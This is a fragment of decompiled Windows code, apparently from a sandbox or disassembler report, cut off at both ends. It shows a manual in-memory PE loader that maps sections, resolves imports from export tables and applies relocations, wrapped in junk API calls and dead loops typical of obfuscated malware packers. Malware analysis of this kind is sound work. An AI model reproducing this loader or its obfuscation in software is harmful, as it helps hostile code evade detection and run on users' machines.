                                                                                                                                                                                                                    				__eflags = _t376;
                                                                                                                                                                                                                    				if(_t376 != 0) {
                                                                                                                                                                                                                    					asm("movsd xmm0, [0x6f2454a0]");
                                                                                                                                                                                                                    					_t625 = _t589 + 4;
                                                                                                                                                                                                                    					_v232 = _t625;
                                                                                                                                                                                                                    					asm("movsd [esp+0x78], xmm0");
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						_t486 = _t376 - 1;
                                                                                                                                                                                                                    						_v228 = _t376 - 1;
                                                                                                                                                                                                                    						__eflags = _t625 - _t709;
                                                                                                                                                                                                                    						if(_t625 <= _t709) {
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						E6F202720(_t486, _t672);
                                                                                                                                                                                                                    						_t694 = _v176;
                                                                                                                                                                                                                    						asm("mulsd xmm0, [esp+0x68]");
                                                                                                                                                                                                                    						_v176 = _t694 + 1;
                                                                                                                                                                                                                    						_t696 = _v204;
                                                                                                                                                                                                                    						asm("addsd xmm0, [esp+0x48]");
                                                                                                                                                                                                                    						 *_t696 =  *_t694;
                                                                                                                                                                                                                    						_t672 = _t696 + 1;
                                                                                                                                                                                                                    						_t376 = _v228;
                                                                                                                                                                                                                    						asm("movsd [esp+0x48], xmm0");
                                                                                                                                                                                                                    						_v204 = _t672;
                                                                                                                                                                                                                    						__eflags = _t376;
                                                                                                                                                                                                                    						if(_t376 != 0) {
                                                                                                                                                                                                                    							asm("movsd xmm0, [esp+0x78]");
                                                                                                                                                                                                                    							_t625 = _v232;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L115;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						__eflags = _t736 - 1;
                                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                                    							goto L114;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t748 = 0x2f;
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							GetMenuCheckMarkDimensions();
                                                                                                                                                                                                                    							_t489 = E6F205DF0(_t585, _t748, _t672, __eflags);
                                                                                                                                                                                                                    							asm("movss xmm1, [0x6f2454b8]");
                                                                                                                                                                                                                    							_t748 = _t489;
                                                                                                                                                                                                                    							asm("movd xmm0, esi");
                                                                                                                                                                                                                    							asm("cvtdq2ps xmm0, xmm0");
                                                                                                                                                                                                                    							asm("divss xmm1, xmm0");
                                                                                                                                                                                                                    							asm("cvttss2si eax, xmm1");
                                                                                                                                                                                                                    							__eflags = _t489 - 1;
                                                                                                                                                                                                                    						} while (__eflags >= 0);
                                                                                                                                                                                                                    						L114:
                                                                                                                                                                                                                    						asm("pause");
                                                                                                                                                                                                                    						E6F205BC0(0xa, _t672);
                                                                                                                                                                                                                    						asm("cvttss2si esi, xmm0");
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				L115:
                                                                                                                                                                                                                    				asm("movsd xmm1, [0x6f245498]");
                                                                                                                                                                                                                    				_t377 = _t376 - 1;
                                                                                                                                                                                                                    				__eflags = _t377;
                                                                                                                                                                                                                    				asm("movsd xmm0, [esp+0x70]");
                                                                                                                                                                                                                    				_t710 = 1;
                                                                                                                                                                                                                    				asm("movsd [esp+0xa0], xmm1");
                                                                                                                                                                                                                    				asm("movsd xmm1, [0x6f245560]");
                                                                                                                                                                                                                    				_v228 = _t377;
                                                                                                                                                                                                                    				asm("movsd [esp+0x98], xmm1");
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					asm("mulsd xmm0, [esp+0x80]");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x60]");
                                                                                                                                                                                                                    					_t377 = E6F202720(_t377, _t672);
                                                                                                                                                                                                                    					asm("mulsd xmm0, [esp+0xa0]");
                                                                                                                                                                                                                    					_t710 = _t710 + 1;
                                                                                                                                                                                                                    					__eflags = _t710;
                                                                                                                                                                                                                    					asm("movsd xmm1, [esp+0x98]");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x48]");
                                                                                                                                                                                                                    					asm("movsd [esp+0x48], xmm0");
                                                                                                                                                                                                                    					asm("movd xmm0, edi");
                                                                                                                                                                                                                    					asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    					asm("comisd xmm1, xmm0");
                                                                                                                                                                                                                    				} while (_t710 >= 0);
                                                                                                                                                                                                                    				_t711 = _v216;
                                                                                                                                                                                                                    				__eflags = _v240 - _t711;
                                                                                                                                                                                                                    				if(_v240 <= _t711) {
                                                                                                                                                                                                                    					asm("movsd xmm1, [esp+0x80]");
                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                    					asm("movsd xmm0, [esp+0xa8]");
                                                                                                                                                                                                                    					_t470 = E6F202720(_t377, _t672);
                                                                                                                                                                                                                    					asm("movsd [esp+0x78], xmm0");
                                                                                                                                                                                                                    					asm("movsd xmm0, [esp+0x60]");
                                                                                                                                                                                                                    					E6F202720(_t470, _t672);
                                                                                                                                                                                                                    					asm("movsd xmm1, [esp+0x80]");
                                                                                                                                                                                                                    					asm("movaps xmm2, xmm0");
                                                                                                                                                                                                                    					asm("addsd xmm2, [esp+0x78]");
                                                                                                                                                                                                                    					_t684 = _v192;
                                                                                                                                                                                                                    					asm("mulsd xmm2, xmm1");
                                                                                                                                                                                                                    					_t377 =  *(_t684 + 0x14) & 0x0000ffff;
                                                                                                                                                                                                                    					_t672 =  *(_t684 + 6) & 0x0000ffff;
                                                                                                                                                                                                                    					_t620 = _t684 + 0x18 + ( *(_t684 + 0x14) & 0x0000ffff);
                                                                                                                                                                                                                    					_v228 = _t620;
                                                                                                                                                                                                                    					asm("divsd xmm2, [0x6f2454d8]");
                                                                                                                                                                                                                    					asm("movsd [esp+0x48], xmm2");
                                                                                                                                                                                                                    					__eflags = _t672;
                                                                                                                                                                                                                    					if(_t672 != 0) {
                                                                                                                                                                                                                    						_t473 = _v240 + _v240;
                                                                                                                                                                                                                    						__eflags = _t473;
                                                                                                                                                                                                                    						_v212 = _t473;
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							_v236 = _t672 - 1;
                                                                                                                                                                                                                    							__eflags = _t473 - _t711;
                                                                                                                                                                                                                    							if(_t473 < _t711) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t693 =  *((intOrPtr*)(_t620 + 0xc)) + _v224;
                                                                                                                                                                                                                    							_v232 =  *((intOrPtr*)(_t620 + 0x14)) + _v196;
                                                                                                                                                                                                                    							_t484 =  *(_t620 + 0x10);
                                                                                                                                                                                                                    							_v220 = _t484;
                                                                                                                                                                                                                    							__eflags = _t484;
                                                                                                                                                                                                                    							if(_t484 != 0) {
                                                                                                                                                                                                                    								_t725 = _v232;
                                                                                                                                                                                                                    								_t624 = _t484;
                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                    									_t485 =  *_t725;
                                                                                                                                                                                                                    									_t725 = _t725 + 1;
                                                                                                                                                                                                                    									 *_t693 = _t485;
                                                                                                                                                                                                                    									_t693 = _t693 + 1;
                                                                                                                                                                                                                    									_t624 = _t624 - 1;
                                                                                                                                                                                                                    									__eflags = _t624;
                                                                                                                                                                                                                    								} while (_t624 != 0);
                                                                                                                                                                                                                    								_t711 = _v216;
                                                                                                                                                                                                                    								_v220 = _t624;
                                                                                                                                                                                                                    								_t620 = _v228;
                                                                                                                                                                                                                    								_t484 = _v220;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t672 = _v236;
                                                                                                                                                                                                                    							_t377 = _t484 - 1;
                                                                                                                                                                                                                    							_t620 = _t620 + 0x28;
                                                                                                                                                                                                                    							_v220 = _t484 - 1;
                                                                                                                                                                                                                    							_v228 = _t620;
                                                                                                                                                                                                                    							__eflags = _t672;
                                                                                                                                                                                                                    							if(_t672 != 0) {
                                                                                                                                                                                                                    								_t473 = _v212;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L137;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						asm("movsd xmm0, [0x6f245500]");
                                                                                                                                                                                                                    						asm("movsd [esp+0x78], xmm0");
                                                                                                                                                                                                                    						asm("movsd xmm0, [0x6f245510]");
                                                                                                                                                                                                                    						asm("movsd [esp+0xa8], xmm0");
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							asm("movss xmm1, [0x6f2455a0]");
                                                                                                                                                                                                                    							__eflags = _t736 - 0x5a;
                                                                                                                                                                                                                    							if(_t736 != 0x5a) {
                                                                                                                                                                                                                    								goto L130;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t477 = GetForegroundWindow();
                                                                                                                                                                                                                    							L131:
                                                                                                                                                                                                                    							asm("movsd xmm1, [esp+0x78]");
                                                                                                                                                                                                                    							asm("movsd xmm2, [esp+0xa8]");
                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                    								asm("addsd xmm1, xmm2");
                                                                                                                                                                                                                    								asm("cvttsd2si eax, xmm1");
                                                                                                                                                                                                                    								asm("movd xmm1, eax");
                                                                                                                                                                                                                    								asm("cvtdq2pd xmm1, xmm1");
                                                                                                                                                                                                                    								asm("movaps xmm0, xmm1");
                                                                                                                                                                                                                    								asm("addsd xmm2, xmm0");
                                                                                                                                                                                                                    								asm("subsd xmm0, xmm2");
                                                                                                                                                                                                                    								asm("cvttsd2si eax, xmm0");
                                                                                                                                                                                                                    								__eflags = _t477 - 0x69;
                                                                                                                                                                                                                    							} while (_t477 <= 0x69);
                                                                                                                                                                                                                    							L133:
                                                                                                                                                                                                                    							_t688 = 0xb;
                                                                                                                                                                                                                    							_v204 = 0x42;
                                                                                                                                                                                                                    							_v236 = 0xb;
                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                    								E6F205BC0(_t688, _t688);
                                                                                                                                                                                                                    								_t620 = _v204;
                                                                                                                                                                                                                    								asm("cvttss2si ecx, xmm0");
                                                                                                                                                                                                                    								_t691 = _t620 * _v236;
                                                                                                                                                                                                                    								_t481 = _t620 - _v204;
                                                                                                                                                                                                                    								_v204 = _t481;
                                                                                                                                                                                                                    								_v236 = _t691;
                                                                                                                                                                                                                    								_t688 = _t691;
                                                                                                                                                                                                                    								_t736 = _t481 * _t691 * _t620;
                                                                                                                                                                                                                    								__eflags = _t736 - 0x5f;
                                                                                                                                                                                                                    							} while (_t736 != 0x5f);
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    							L130:
                                                                                                                                                                                                                    							asm("movaps xmm0, xmm1");
                                                                                                                                                                                                                    							_t474 = E6F205B70(_t620);
                                                                                                                                                                                                                    							_t475 = E6F205DC0(_t474, 0x6e);
                                                                                                                                                                                                                    							asm("cdq");
                                                                                                                                                                                                                    							_t477 = _t474 / _t475;
                                                                                                                                                                                                                    							__eflags = _t477 - 0x69;
                                                                                                                                                                                                                    							if(_t477 > 0x69) {
                                                                                                                                                                                                                    								goto L133;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L131;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				L137:
                                                                                                                                                                                                                    				asm("movsd xmm0, [esp+0x70]");
                                                                                                                                                                                                                    				_t712 = 1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					asm("subsd xmm0, [esp+0x90]");
                                                                                                                                                                                                                    					asm("mulsd xmm0, xmm1");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x60]");
                                                                                                                                                                                                                    					_t377 = E6F202720(_t377, _t672);
                                                                                                                                                                                                                    					asm("mulsd xmm0, [esp+0x68]");
                                                                                                                                                                                                                    					_t712 = _t712 + 1;
                                                                                                                                                                                                                    					__eflags = _t712;
                                                                                                                                                                                                                    					asm("movsd xmm1, [esp+0x58]");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x48]");
                                                                                                                                                                                                                    					asm("movsd [esp+0x48], xmm0");
                                                                                                                                                                                                                    					asm("movd xmm0, edi");
                                                                                                                                                                                                                    					asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    					asm("comisd xmm1, xmm0");
                                                                                                                                                                                                                    					asm("movsd xmm1, [esp+0x80]");
                                                                                                                                                                                                                    				} while (_t712 >= 0);
                                                                                                                                                                                                                    				_t590 = _v240;
                                                                                                                                                                                                                    				_t713 = _v216;
                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                    				__eflags = _t590 - _t672 >> 1 - _t713;
                                                                                                                                                                                                                    				_t591 =  <  ? _t713 : _t590;
                                                                                                                                                                                                                    				_t382 = _v192 - 0xffffff80;
                                                                                                                                                                                                                    				_v212 = _t382;
                                                                                                                                                                                                                    				_v240 = _t591;
                                                                                                                                                                                                                    				_t673 =  *_t382;
                                                                                                                                                                                                                    				_t384 = _v224 + _t673;
                                                                                                                                                                                                                    				_v204 = _t384;
                                                                                                                                                                                                                    				_t385 =  *(_t384 + 0xc);
                                                                                                                                                                                                                    				_v236 = _t385;
                                                                                                                                                                                                                    				__eflags = _t385;
                                                                                                                                                                                                                    				if(_t385 != 0) {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						__eflags = _t673;
                                                                                                                                                                                                                    						if(_t673 == 0) {
                                                                                                                                                                                                                    							goto L160;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                                                                    						__eflags = _t591 - _t673 >> 1 - _t713;
                                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                    								_t744 = 0x43;
                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                    									_t612 = _t744;
                                                                                                                                                                                                                    									_t744 = E6F205DF0(_t585, _t744, _t673, __eflags);
                                                                                                                                                                                                                    									asm("movd xmm0, esi");
                                                                                                                                                                                                                    									asm("cvtdq2ps xmm0, xmm0");
                                                                                                                                                                                                                    									E6F205B70(_t612);
                                                                                                                                                                                                                    									__eflags = _t744 - 0x53;
                                                                                                                                                                                                                    								} while (__eflags <= 0);
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t613 = _v120(_v236 + _v224);
                                                                                                                                                                                                                    						_t455 = _v208;
                                                                                                                                                                                                                    						_v240 = _t613;
                                                                                                                                                                                                                    						_v224 =  *_t455 + _v228;
                                                                                                                                                                                                                    						_t682 =  *((intOrPtr*)(_t455 + 0x10)) + _v228;
                                                                                                                                                                                                                    						_v232 = _t682;
                                                                                                                                                                                                                    						__eflags =  *_t682;
                                                                                                                                                                                                                    						if( *_t682 != 0) {
                                                                                                                                                                                                                    							_t456 = _v224;
                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                    								__eflags = _t456;
                                                                                                                                                                                                                    								if(_t456 == 0) {
                                                                                                                                                                                                                    									L149:
                                                                                                                                                                                                                    									_t458 =  *_t682 + _v228;
                                                                                                                                                                                                                    									_v216 = _t458;
                                                                                                                                                                                                                    									_t460 = _v16(_t613, _t458 + 2);
                                                                                                                                                                                                                    									_t683 = _v240;
                                                                                                                                                                                                                    									 *_t683 = _t460;
                                                                                                                                                                                                                    									_t682 = _t683 + 4;
                                                                                                                                                                                                                    									_t456 = _v232;
                                                                                                                                                                                                                    									_v240 = _t682;
                                                                                                                                                                                                                    									__eflags = _t456;
                                                                                                                                                                                                                    									if(_t456 != 0) {
                                                                                                                                                                                                                    										goto L150;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									__eflags =  *_t456;
                                                                                                                                                                                                                    									if( *_t456 >= 0) {
                                                                                                                                                                                                                    										goto L149;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										__eflags = _v244 - _t713;
                                                                                                                                                                                                                    										if(_v244 < _t713) {
                                                                                                                                                                                                                    											L156:
                                                                                                                                                                                                                    											GdiFlush();
                                                                                                                                                                                                                    											goto L156;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										_t713 = _v220;
                                                                                                                                                                                                                    										 *_t682 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t613 + 0x3c)) + _t613 + 0x78)) + _t613 + 0x1c)) + (( *_v224 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t613 + 0x3c)) + _t613 + 0x78)) + _t613 + 0x10))) * 4 + _v240)) + _v240;
                                                                                                                                                                                                                    										_t682 =  &(_t682[1]);
                                                                                                                                                                                                                    										_t456 = _v224;
                                                                                                                                                                                                                    										_v232 = _t682;
                                                                                                                                                                                                                    										L150:
                                                                                                                                                                                                                    										_t456 = _t456 + 4;
                                                                                                                                                                                                                    										__eflags = _t456;
                                                                                                                                                                                                                    										_v232 = _t456;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags =  *_t682;
                                                                                                                                                                                                                    								_t613 = _v248;
                                                                                                                                                                                                                    							} while ( *_t682 != 0);
                                                                                                                                                                                                                    							_t455 = _v216;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t614 = _v244;
                                                                                                                                                                                                                    						__eflags = _t614 - _t713;
                                                                                                                                                                                                                    						_t673 =  *(_t455 + 0x20);
                                                                                                                                                                                                                    						_t591 =  <=  ? _t713 : _t614;
                                                                                                                                                                                                                    						_v240 = _t673;
                                                                                                                                                                                                                    						_t385 = _t455 + 0x14;
                                                                                                                                                                                                                    						_v244 = _t591;
                                                                                                                                                                                                                    						_v208 = _t455 + 0x14;
                                                                                                                                                                                                                    						__eflags = _t673;
                                                                                                                                                                                                                    						if(_t673 != 0) {
                                                                                                                                                                                                                    							_t385 = _v216;
                                                                                                                                                                                                                    							_t673 =  *_v216;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L160;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				L160:
                                                                                                                                                                                                                    				asm("movsd xmm0, [esp+0x70]");
                                                                                                                                                                                                                    				_t714 = 1;
                                                                                                                                                                                                                    				_v232 = _t736;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					asm("mulsd xmm0, [esp+0x80]");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x60]");
                                                                                                                                                                                                                    					_t385 = E6F202720(_t385, _t673);
                                                                                                                                                                                                                    					asm("mulsd xmm0, [esp+0xa0]");
                                                                                                                                                                                                                    					_t714 = _t714 + 1;
                                                                                                                                                                                                                    					__eflags = _t714;
                                                                                                                                                                                                                    					asm("movsd xmm1, [esp+0x98]");
                                                                                                                                                                                                                    					asm("addsd xmm0, [esp+0x48]");
                                                                                                                                                                                                                    					asm("movsd [esp+0x48], xmm0");
                                                                                                                                                                                                                    					asm("movd xmm0, edi");
                                                                                                                                                                                                                    					asm("cvtdq2pd xmm0, xmm0");
                                                                                                                                                                                                                    					asm("comisd xmm1, xmm0");
                                                                                                                                                                                                                    				} while (_t714 >= 0);
                                                                                                                                                                                                                    				_t592 = _v240;
                                                                                                                                                                                                                    				_t715 = _v192;
                                                                                                                                                                                                                    				_t674 = _v224;
                                                                                                                                                                                                                    				_t273 = _t592 + 4; // 0xb8fea9c
                                                                                                                                                                                                                    				__eflags = _t273 - _v216;
                                                                                                                                                                                                                    				_t593 =  <=  ? _v216 : _v240;
                                                                                                                                                                                                                    				_v196 = _t674 -  *((intOrPtr*)(_t715 + 0x34));
                                                                                                                                                                                                                    				_t716 = _v216;
                                                                                                                                                                                                                    				_t390 = _t715 + 0xa0;
                                                                                                                                                                                                                    				_v240 = _t593;
                                                                                                                                                                                                                    				_v200 = _t390;
                                                                                                                                                                                                                    				__eflags =  *(_t390 + 4);
                                                                                                                                                                                                                    				if( *(_t390 + 4) != 0) {
                                                                                                                                                                                                                    					_t407 =  *_t390 + _t674;
                                                                                                                                                                                                                    					_t674 = _v232;
                                                                                                                                                                                                                    					_v208 = _t407;
                                                                                                                                                                                                                    					_t736 = _t674;
                                                                                                                                                                                                                    					_t408 = _t407 + 4;
                                                                                                                                                                                                                    					_v212 = _t408;
                                                                                                                                                                                                                    					_t390 =  *_t408;
                                                                                                                                                                                                                    					__eflags = _t390;
                                                                                                                                                                                                                    					if(_t390 != 0) {
                                                                                                                                                                                                                    						_v116 = _t593 + 4;
                                                                                                                                                                                                                    						_t736 = _t674;
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							_t676 = _t593 + 4;
                                                                                                                                                                                                                    							__eflags = _t676 - _t716;
                                                                                                                                                                                                                    							if(_t676 <= _t716) {
                                                                                                                                                                                                                    								_v232 = 0x2a;
                                                                                                                                                                                                                    								_v236 = 0;
                                                                                                                                                                                                                    								__eflags = _t736 - 0xc;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									_t722 = _v232;
                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                    										GetCapture();
                                                                                                                                                                                                                    										_t421 = (_v236 << 0x00000020 | _t722) << 1;
                                                                                                                                                                                                                    										_t722 = _t722 + _t722;
                                                                                                                                                                                                                    										_v236 = _t421;
                                                                                                                                                                                                                    										__eflags = _t722 - 0xc;
                                                                                                                                                                                                                    									} while (__eflags != 0);
                                                                                                                                                                                                                    									_t716 = _v216;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								CloseClipboard();
                                                                                                                                                                                                                    								_t736 = 0xd;
                                                                                                                                                                                                                    								_v232 = 0;
                                                                                                                                                                                                                    								_t304 = _t736 + 0xc; // 0x19
                                                                                                                                                                                                                    								_t600 = _t304;
                                                                                                                                                                                                                    								_t410 = E6F205DF0(_t585, _t304, _t676, __eflags);
                                                                                                                                                                                                                    								__eflags = _t410 + 1 - 6;
                                                                                                                                                                                                                    								if(_t410 + 1 >= 6) {
                                                                                                                                                                                                                    									_t445 = _v232;
                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                    										_t736 = E6F236550(_t736, _t445, _t736, _t445);
                                                                                                                                                                                                                    										_t445 = _t676;
                                                                                                                                                                                                                    										__eflags = _t736 - 6;
                                                                                                                                                                                                                    									} while (_t736 >= 6);
                                                                                                                                                                                                                    									asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								asm("movss xmm0, [0x6f2455ec]");
                                                                                                                                                                                                                    								asm("movss [esp+0xf8], xmm0");
                                                                                                                                                                                                                    								asm("movss xmm0, [0x6f24559c]");
                                                                                                                                                                                                                    								asm("movss [esp+0x18], xmm0");
                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                    									GetForegroundWindow();
                                                                                                                                                                                                                    									asm("cvttss2si ecx, [esp+0x18]");
                                                                                                                                                                                                                    									asm("movss xmm0, [esp+0x18]");
                                                                                                                                                                                                                    									asm("mulss xmm0, [esp+0xf8]");
                                                                                                                                                                                                                    									asm("movss [esp+0xf8], xmm0");
                                                                                                                                                                                                                    									E6F205BC0(_t600, _t676);
                                                                                                                                                                                                                    									asm("movss xmm1, [esp+0xf8]");
                                                                                                                                                                                                                    									asm("divss xmm1, xmm0");
                                                                                                                                                                                                                    									asm("movss [esp+0x18], xmm0");
                                                                                                                                                                                                                    									asm("cvttss2si esi, xmm1");
                                                                                                                                                                                                                    									__eflags = _t736 - 0x12;
                                                                                                                                                                                                                    								} while (_t736 <= 0x12);
                                                                                                                                                                                                                    								_t674 = _v228;
                                                                                                                                                                                                                    								_t415 = _v200;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t415 = _t390 + 0xfffffff8 >> 1;
                                                                                                                                                                                                                    								_t674 =  *_v208 + _v224;
                                                                                                                                                                                                                    								_v228 = _t674;
                                                                                                                                                                                                                    								_v220 = _v208 + 8;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t593 = _v240;
                                                                                                                                                                                                                    							__eflags = _t415;
                                                                                                                                                                                                                    							while(_t415 != 0) {
                                                                                                                                                                                                                    								_t415 = _t415 - 1;
                                                                                                                                                                                                                    								_v200 = _t415;
                                                                                                                                                                                                                    								__eflags = _t593 - _t716;
                                                                                                                                                                                                                    								if(_t593 > _t716) {
                                                                                                                                                                                                                    									__eflags = _v116 - _t716;
                                                                                                                                                                                                                    									if(_v116 <= _t716) {
                                                                                                                                                                                                                    										__eflags = _t736 - 0x21;
                                                                                                                                                                                                                    										if(_t736 < 0x21) {
                                                                                                                                                                                                                    											__imp__CoFreeUnusedLibraries();
                                                                                                                                                                                                                    											asm("movss xmm0, [0x6f2455e8]");
                                                                                                                                                                                                                    											E6F205B70(_t593);
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										L224:
                                                                                                                                                                                                                    										goto L224;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									_t606 =  *_v220 & 0x0000ffff;
                                                                                                                                                                                                                    									_t440 = _t606 >> 0xc;
                                                                                                                                                                                                                    									__eflags = _t440 - 0xa;
                                                                                                                                                                                                                    									if(_t440 != 0xa) {
                                                                                                                                                                                                                    										__eflags = _t440 - 3;
                                                                                                                                                                                                                    										if(_t440 != 3) {
                                                                                                                                                                                                                    											__eflags = _t440 - 1;
                                                                                                                                                                                                                    											if(_t440 != 1) {
                                                                                                                                                                                                                    												__eflags = _t440 - 2;
                                                                                                                                                                                                                    												if(_t440 == 2) {
                                                                                                                                                                                                                    													_t441 = _v196;
                                                                                                                                                                                                                    													goto L190;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												_t441 = _v196 >> 0x10;
                                                                                                                                                                                                                    												L190:
                                                                                                                                                                                                                    												_t607 = _t606 & 0x00000fff;
                                                                                                                                                                                                                    												_t320 = _t607 + _t674;
                                                                                                                                                                                                                    												 *_t320 =  *(_t607 + _t674) + _t441;
                                                                                                                                                                                                                    												__eflags =  *_t320;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											 *((intOrPtr*)((_t606 & 0x00000fff) + _t674)) =  *((intOrPtr*)((_t606 & 0x00000fff) + _t674)) + _v196;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										 *((intOrPtr*)((_t606 & 0x00000fff) + _t674)) =  *((intOrPtr*)((_t606 & 0x00000fff) + _t674)) + _v196;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									_t322 =  &_v220;
                                                                                                                                                                                                                    									 *_t322 = _v220 + 2;
                                                                                                                                                                                                                    									__eflags =  *_t322;
                                                                                                                                                                                                                    									_t593 = _v240;
                                                                                                                                                                                                                    									_t415 = _v200;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t415;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_v236 = _t593;
                                                                                                                                                                                                                    							_v200 = _t415 - 1;
                                                                                                                                                                                                                    							__eflags = _t593 - _t716;
                                                                                                                                                                                                                    							if(_t593 > _t716) {
                                                                                                                                                                                                                    								_t423 = _t593 + _t593;
                                                                                                                                                                                                                    								_v232 = _t423;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									__eflags = _t423 - _t716;
                                                                                                                                                                                                                    									if(_t423 >= _t716) {
                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									__eflags = _t736 - 0x4f;
                                                                                                                                                                                                                    									if(_t736 == 0x4f) {
                                                                                                                                                                                                                    										__imp__SetProcessDPIAware();
                                                                                                                                                                                                                    										goto L200;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										GetMenuCheckMarkDimensions();
                                                                                                                                                                                                                    										asm("movss xmm0, [0x6f245588]");
                                                                                                                                                                                                                    										_t431 = E6F2369A0(0x15, 0, E6F205B70(_t593), _t674);
                                                                                                                                                                                                                    										__eflags = _t431 - 0x24c - 0x16;
                                                                                                                                                                                                                    										if(_t431 - 0x24c < 0x16) {
                                                                                                                                                                                                                    											L200:
                                                                                                                                                                                                                    											GetEnvironmentStringsW();
                                                                                                                                                                                                                    											asm("movss xmm0, [0x6f2455e8]");
                                                                                                                                                                                                                    											_t736 = E6F205B70(_t593);
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											E6F205BC0(0xa, _t674);
                                                                                                                                                                                                                    											asm("cvttss2si edx, xmm0");
                                                                                                                                                                                                                    											_t605 = _t674 + (_t674 << 2);
                                                                                                                                                                                                                    											_t593 = _t674 + (_t674 << 2) + _t605;
                                                                                                                                                                                                                    											_t736 = _t674 - _t674 + (_t674 << 2) + _t605;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									_t428 = _v236 + 1;
                                                                                                                                                                                                                    									_v236 = _t428;
                                                                                                                                                                                                                    									__eflags = _t428 - _t716;
                                                                                                                                                                                                                    									_t423 = _v232;
                                                                                                                                                                                                                    									if(_t428 > _t716) {
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									L204:
                                                                                                                                                                                                                    									_t593 = _v240;
                                                                                                                                                                                                                    									goto L205;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_t602 = _v208 +  *_v212;
                                                                                                                                                                                                                    								__eflags = _t602;
                                                                                                                                                                                                                    								_v208 = _t602;
                                                                                                                                                                                                                    								goto L204;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L205:
